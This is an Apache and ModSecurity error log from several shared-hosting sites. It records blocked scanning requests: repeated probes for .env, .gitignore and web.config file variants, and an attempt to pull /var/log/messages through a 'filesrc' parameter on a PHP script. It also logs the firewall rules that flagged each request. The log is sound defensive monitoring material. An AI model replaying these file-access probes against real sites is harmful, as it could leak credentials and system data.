[Mon May 11 12:09:35.345113 2026] [security2:error] [pid 1254242:tid 1254265] [client 185.177.72.9:40804] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /logs/.env.backup.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/logs/.env.backup.orig"] [unique_id "agGq374KNmD_mZ_vlf8_RwAAAFQ"]
[Mon May 11 12:09:35.345625 2026] [security2:error] [pid 1254242:tid 1254265] [client 185.177.72.9:40804] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/logs/.env.backup.orig"] [unique_id "agGq374KNmD_mZ_vlf8_RwAAAFQ"]
[Mon May 11 12:09:36.773552 2026] [security2:error] [pid 1254242:tid 1254265] [client 185.177.72.9:40804] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGq374KNmD_mZ_vlf8_RwAAAFQ"]
[Mon May 11 12:09:36.799295 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:40806] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /logs/.gitignore.draft"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/logs/.gitignore.draft"] [unique_id "agGq4L4KNmD_mZ_vlf8_SgAAAFg"]
[Mon May 11 12:09:36.799915 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:40806] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/logs/.gitignore.draft"] [unique_id "agGq4L4KNmD_mZ_vlf8_SgAAAFg"]
[Mon May 11 12:09:38.422625 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:40806] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGq4L4KNmD_mZ_vlf8_SgAAAFg"]
[Mon May 11 12:09:38.450797 2026] [security2:error] [pid 1256241:tid 1256254] [client 185.177.72.9:40808] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /logs/.gitignore.draft"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/logs/.gitignore.draft"] [unique_id "agGq4pkIEwRJMyDaV55UZgAAAUg"]
[Mon May 11 12:09:38.451385 2026] [security2:error] [pid 1256241:tid 1256254] [client 185.177.72.9:40808] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/logs/.gitignore.draft"] [unique_id "agGq4pkIEwRJMyDaV55UZgAAAUg"]
[Mon May 11 12:09:40.506503 2026] [security2:error] [pid 1256241:tid 1256254] [client 185.177.72.9:40808] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGq4pkIEwRJMyDaV55UZgAAAUg"]
[Mon May 11 12:09:48.322671 2026] [security2:error] [pid 1254179:tid 1254195] [client 216.73.216.110:36406] ModSecurity: Warning. Matched phrase "var/log/messages" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/messages found within ARGS:filesrc: /var/log/messages"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGq7GS6k_SCYd1AVZq1YQAAAQ4"]
[Mon May 11 12:09:48.323982 2026] [security2:error] [pid 1254179:tid 1254195] [client 216.73.216.110:36406] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGq7GS6k_SCYd1AVZq1YQAAAQ4"]
[Mon May 11 12:09:48.446585 2026] [security2:error] [pid 1254179:tid 1254195] [client 216.73.216.110:36406] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGq7GS6k_SCYd1AVZq1YQAAAQ4"]
[Mon May 11 12:09:48.961308 2026] [security2:error] [pid 1254133:tid 1254155] [client 102.165.1.152:58929] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGq7BjZymfuKpjWXeiDZwAAANM"], referer: https://www.piregwan-genesis.com/
[Mon May 11 12:09:50.390460 2026] [:error] [pid 1254179:tid 1254194] [client 46.151.178.13:38486] File does not exist: /home/totalcloud/public_html/index.php, referer: http://217.113.192.26:443/
[Mon May 11 12:09:57.127078 2026] [security2:error] [pid 1254133:tid 1254144] [client 185.177.72.9:35630] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /messaging/.env.staging.rc1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/messaging/.env.staging.rc1"] [unique_id "agGq9RjZymfuKpjWXeiDegAAAMg"]
[Mon May 11 12:09:57.127400 2026] [security2:error] [pid 1254133:tid 1254144] [client 185.177.72.9:35630] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/messaging/.env.staging.rc1"] [unique_id "agGq9RjZymfuKpjWXeiDegAAAMg"]
[Mon May 11 12:09:58.307358 2026] [security2:error] [pid 1254133:tid 1254144] [client 185.177.72.9:35630] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGq9RjZymfuKpjWXeiDegAAAMg"]
[Mon May 11 12:09:58.333848 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:35644] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /messaging/.env.staging.rc1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/messaging/.env.staging.rc1"] [unique_id "agGq9kYQeUtAPynIs6xfRgAAAAo"]
[Mon May 11 12:09:58.334072 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:35644] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/messaging/.env.staging.rc1"] [unique_id "agGq9kYQeUtAPynIs6xfRgAAAAo"]
[Mon May 11 12:09:59.570414 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:35644] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGq9kYQeUtAPynIs6xfRgAAAAo"]
[Mon May 11 12:10:03.039058 2026] [security2:error] [pid 1254328:tid 1254346] [client 45.89.241.203:31811] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGq-0Rdw2n9wv6Ai48NxQAAAJA"], referer: https://www.piregwan-genesis.com/
[Mon May 11 12:10:30.602190 2026] [security2:error] [pid 1256241:tid 1256267] [client 185.177.72.9:64522] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mocha/.env.test.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/mocha/.env.test.orig"] [unique_id "agGrFpkIEwRJMyDaV55UsgAAAVU"]
[Mon May 11 12:10:30.604453 2026] [security2:error] [pid 1256241:tid 1256267] [client 185.177.72.9:64522] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/mocha/.env.test.orig"] [unique_id "agGrFpkIEwRJMyDaV55UsgAAAVU"]
[Mon May 11 12:10:32.140937 2026] [security2:error] [pid 1256241:tid 1256267] [client 185.177.72.9:64522] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGrFpkIEwRJMyDaV55UsgAAAVU"]
[Mon May 11 12:10:32.166819 2026] [security2:error] [pid 1254328:tid 1254348] [client 185.177.72.9:64532] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mocha/.env.test.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/mocha/.env.test.orig"] [unique_id "agGrGERdw2n9wv6Ai48N7QAAAJI"]
[Mon May 11 12:10:32.167199 2026] [security2:error] [pid 1254328:tid 1254348] [client 185.177.72.9:64532] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/mocha/.env.test.orig"] [unique_id "agGrGERdw2n9wv6Ai48N7QAAAJI"]
[Mon May 11 12:10:34.434136 2026] [security2:error] [pid 1254328:tid 1254348] [client 185.177.72.9:64532] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGrGERdw2n9wv6Ai48N7QAAAJI"]
[Mon May 11 12:10:40.260277 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:41324] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /models/web.config.draft"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/models/web.config.draft"] [unique_id "agGrIBjZymfuKpjWXeiDtQAAAMs"]
[Mon May 11 12:10:40.261234 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:41324] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/models/web.config.draft"] [unique_id "agGrIBjZymfuKpjWXeiDtQAAAMs"]
[Mon May 11 12:10:42.190206 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:41324] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGrIBjZymfuKpjWXeiDtQAAAMs"]
[Mon May 11 12:10:42.221521 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:41328] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /models/web.config.draft"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/models/web.config.draft"] [unique_id "agGrIhjZymfuKpjWXeiDtwAAAM8"]
[Mon May 11 12:10:42.223142 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:41328] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/models/web.config.draft"] [unique_id "agGrIhjZymfuKpjWXeiDtwAAAM8"]
[Mon May 11 12:10:43.737771 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:41328] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGrIhjZymfuKpjWXeiDtwAAAM8"]
[Mon May 11 12:10:43.765814 2026] [security2:error] [pid 1254133:tid 1254139] [client 185.177.72.9:4032] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env.debug-hotfix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/modules/.env.debug-hotfix"] [unique_id "agGrIxjZymfuKpjWXeiDuQAAAMM"]
[Mon May 11 12:10:43.766478 2026] [security2:error] [pid 1254133:tid 1254139] [client 185.177.72.9:4032] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/modules/.env.debug-hotfix"] [unique_id "agGrIxjZymfuKpjWXeiDuQAAAMM"]
[Mon May 11 12:10:44.992093 2026] [security2:error] [pid 1254133:tid 1254139] [client 185.177.72.9:4032] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGrIxjZymfuKpjWXeiDuQAAAMM"]
[Mon May 11 12:10:45.027760 2026] [security2:error] [pid 1254242:tid 1254267] [client 185.177.72.9:4048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env.debug-hotfix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/modules/.env.debug-hotfix"] [unique_id "agGrJb4KNmD_mZ_vlf8_rAAAAFY"]
[Mon May 11 12:10:45.028471 2026] [security2:error] [pid 1254242:tid 1254267] [client 185.177.72.9:4048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/modules/.env.debug-hotfix"] [unique_id "agGrJb4KNmD_mZ_vlf8_rAAAAFY"]
[Mon May 11 12:10:46.675670 2026] [security2:error] [pid 1254242:tid 1254267] [client 185.177.72.9:4048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGrJb4KNmD_mZ_vlf8_rAAAAFY"]
[Mon May 11 12:10:47.203027 2026] [authz_core:error] [pid 1254133:tid 1254160] [client 95.111.239.37:59105] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/ID3/error_log, referer: binance.com
